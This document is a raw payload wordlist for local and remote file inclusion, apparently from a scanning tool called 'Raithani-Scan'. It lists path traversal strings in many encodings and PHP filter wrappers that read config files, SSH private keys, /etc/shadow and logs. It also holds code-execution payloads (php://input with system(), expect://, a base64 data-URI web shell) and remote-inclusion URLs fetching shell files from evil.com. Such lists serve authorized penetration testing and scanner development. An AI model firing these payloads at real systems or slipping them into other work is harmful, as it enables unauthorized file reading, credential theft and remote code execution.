# LFI/RFI Payloads - Raithani-Scan
# ==================================
# Path Traversal - Basic
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
..\\..\\..\\..\\..\\..\\..\\etc\\passwd
..\..\..\..\..\..\..\etc\passwd
....//....//....//....//etc/passwd
....\/....\/....\/....\/etc/passwd
..;/..;/..;/..;/etc/passwd

# Path Traversal - Encoded
%2e%2e/etc/passwd
%2e%2e%2fetc/passwd
..%2fetc/passwd
%2e%2e%5cetc/passwd
..%5cetc/passwd
%252e%252e%252fetc/passwd
%252e%252e%255cetc/passwd
..%252fetc/passwd
..%252f..%252f..%252fetc/passwd
..%c0%afetc/passwd
%c0%ae%c0%ae/etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
%uff0e%uff0e/etc/passwd
%uff0e%uff0e%u2215etc/passwd

# Path Traversal - Nested/Double
....//....//etc/passwd
....//....//....//etc/passwd
....//....//....//....//etc/passwd
..//..//..//..//..//etc/passwd
....\/....\/....\/etc/passwd
..\\/..\\/..\\/etc/passwd

# Null Byte Injection
../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../../../etc/passwd%00
../../etc/passwd%00.html
../../etc/passwd%00.php
../../../etc/passwd%2500
../../../../etc/passwd%2500

# PHP Wrappers - File Read
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=wp-config.php
php://filter/convert.base64-encode/resource=../index.php
php://filter/convert.base64-encode/resource=../../index.php
php://filter/read=convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/convert.base64-encode/resource=/etc/hosts
php://filter/convert.base64-encode/resource=/etc/issue
php://filter/convert.base64-encode/resource=/proc/self/environ
php://filter/convert.base64-encode/resource=/proc/self/cmdline
php://filter/convert.base64-encode/resource=/proc/self/fd/0
php://filter/convert.base64-encode/resource=/proc/self/fd/1
php://filter/convert.base64-encode/resource=/proc/self/fd/2
php://filter/convert.base64-encode/resource=/var/log/apache2/access.log
php://filter/convert.base64-encode/resource=/var/log/nginx/access.log
php://filter/convert.base64-encode/resource=/var/log/httpd/access_log
php://filter/convert.base64-encode/resource=/var/www/html/index.php
php://filter/convert.base64-encode/resource=/etc/nginx/nginx.conf
php://filter/convert.base64-encode/resource=/etc/apache2/apache2.conf
php://filter/convert.base64-encode/resource=/etc/httpd/conf/httpd.conf
php://filter/read=convert.base64-encode/resource=../../../etc/passwd
php://filter/read=string.toupper|string.rot13/resource=index.php

# PHP Wrappers - Execution
php://input with POST: <?php system('id');?>
php://input with POST: <?php system($_GET['c']);?>
expect://id
expect://whoami
expect://ls
expect://uname -a

# Data URI Wrapper
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==
data://text/plain,<?php%20system('id');?>
data://text/plain;base64,d2hvYW1p

# Windows Files
../../../../windows/win.ini
../../../../windows/system32/drivers/etc/hosts
../../../../boot.ini
../../../../windows/repair/SAM
../../../../windows/repair/SYSTEM
../../../../windows/system32/config/sam
../../../../windows/system32/config/system
../../../../windows/php.ini
../../../../windows/my.ini

# Common Sensitive Files
/etc/passwd
/etc/shadow
/etc/hosts
/etc/issue
/etc/group
/etc/hostname
/etc/network/interfaces
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/ssl/openssl.cnf
/etc/my.cnf
/etc/mysql/my.cnf
/etc/mysql/my.ini
/etc/php.ini
/etc/php/php.ini
/etc/httpd/conf/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/envvars
/etc/apache2/ports.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-available/default
/etc/crontab
/proc/self/environ
/proc/self/cmdline
/proc/version
/proc/cpuinfo
/proc/meminfo
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/root/.bashrc
/root/.bash_history
/root/.ssh/id_rsa
/home/*/.ssh/id_rsa
/var/log/apache2/access.log
/var/log/nginx/access.log
/var/log/httpd/access_log
/var/log/auth.log
/var/log/syslog
/var/log/messages
/var/www/html/index.html
/var/www/html/index.php
/var/www/config.php
/var/www/configuration.php
/var/www/wp-config.php
/opt/lampp/etc/passwd
/usr/local/etc/php/php.ini

# Remote File Inclusion (RFI)
http://evil.com/shell.txt?
http://evil.com/shell.txt?&
http://evil.com/shell.php?
http://evil.com/shell.php?&
https://evil.com/shell.txt?
https://evil.com/shell.php?
http://evil.com/shell.txt%00
http://evil.com/shell.php%00
http://evil.com/shell.txt?fake=.php
http://evil.com/shell.txt%23
